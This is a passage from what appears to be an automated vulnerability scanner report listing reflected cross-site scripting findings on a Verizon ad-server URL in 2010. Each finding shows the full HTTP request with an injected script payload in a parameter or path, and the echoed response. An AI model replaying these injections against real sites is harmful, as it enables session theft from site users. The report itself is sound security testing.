Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=f54fd"><script>alert(1)</script>ecbc842c8ef&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.452. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [webex parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the webex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f786"><script>alert(1)</script>f1650cfbf93 was submitted in the webex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=3f786"><script>alert(1)</script>f1650cfbf93&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:14:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
rtype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=3f786"><script>alert(1)</script>f1650cfbf93&search=" target="_top">
...[SNIP]...

2.453. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [webhosting parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the webhosting request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac813"><script>alert(1)</script>f2c20e38879 was submitted in the webhosting parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=ac813"><script>alert(1)</script>f2c20e38879&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ervice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=ac813"><script>alert(1)</script>f2c20e38879&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.454. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb80c"><script>alert(1)</script>473af86032c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.netcb80c"><script>alert(1)</script>473af86032c/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:08:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 359
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 359

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.netcb80c"><script>alert(1)</script>473af86032c/homepage/721820081/Top/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

2.455. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffe7a"><script>alert(1)</script>11ed9e56804 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepageffe7a"><script>alert(1)</script>11ed9e56804/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:08:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3b45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepageffe7a"><script>alert(1)</script>11ed9e56804/L15/1865519261/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&p
...[SNIP]...

2.456. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2643e"><script>alert(1)</script>bc8894535d6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2643e"><script>alert(1)</script>bc8894535d6?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:09:16 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PKCpLU10erias|O10escOu; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.verizononline.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1531
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3b45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1531

<IFRAME SRC="http://ad.doubleclick.net/adi/N3285.verizon/B2343920.19;sz=300x250;click0=http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/2643e"><script>alert(1)</script>bc8894535d6/L24/1693794449/UNKNOWN/VDSL/LMB_NAF_RON_300_2010_11_01/LowerMyBills_NAF_vznews_300_2009-06.html/726e6f58326b7a6e4b45494141693565?;ord=1693794449?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSP
...[SNIP]...

2.457. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0f79"><script>alert(1)</script>b5330b49b11 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Topd0f79"><script>alert(1)</script>b5330b49b11?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:09:04 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 351
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 351

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/541530198/Topd0f79"><script>alert(1)</script>b5330b49b11/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

2.458. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [audio_conf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the audio_conf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3941"><script>alert(1)</script>ca9d73c27a4 was submitted in the audio_conf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=a3941"><script>alert(1)</script>ca9d73c27a4&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:05:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=a3941"><script>alert(1)</script>ca9d73c27a4&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.459. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [bbaw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the bbaw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e02f"><script>alert(1)</script>e00026be7b2 was submitted in the bbaw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=6e02f"><script>alert(1)</script>e00026be7b2&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:06:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=6e02f"><script>alert(1)</script>e00026be7b2&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.460. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [connex parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the connex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3596f"><script>alert(1)</script>fe1c24a982e was submitted in the connex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=3596f"><script>alert(1)</script>fe1c24a982e&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:00:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3b45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
latformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=3596f"><script>alert(1)</script>fe1c24a982e&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_
...[SNIP]...

2.461. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [fiostvown parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the fiostvown request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ed4c"><script>alert(1)</script>d1b86a9b76b was submitted in the fiostvown parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=9ed4c"><script>alert(1)</script>d1b86a9b76b&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:01:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
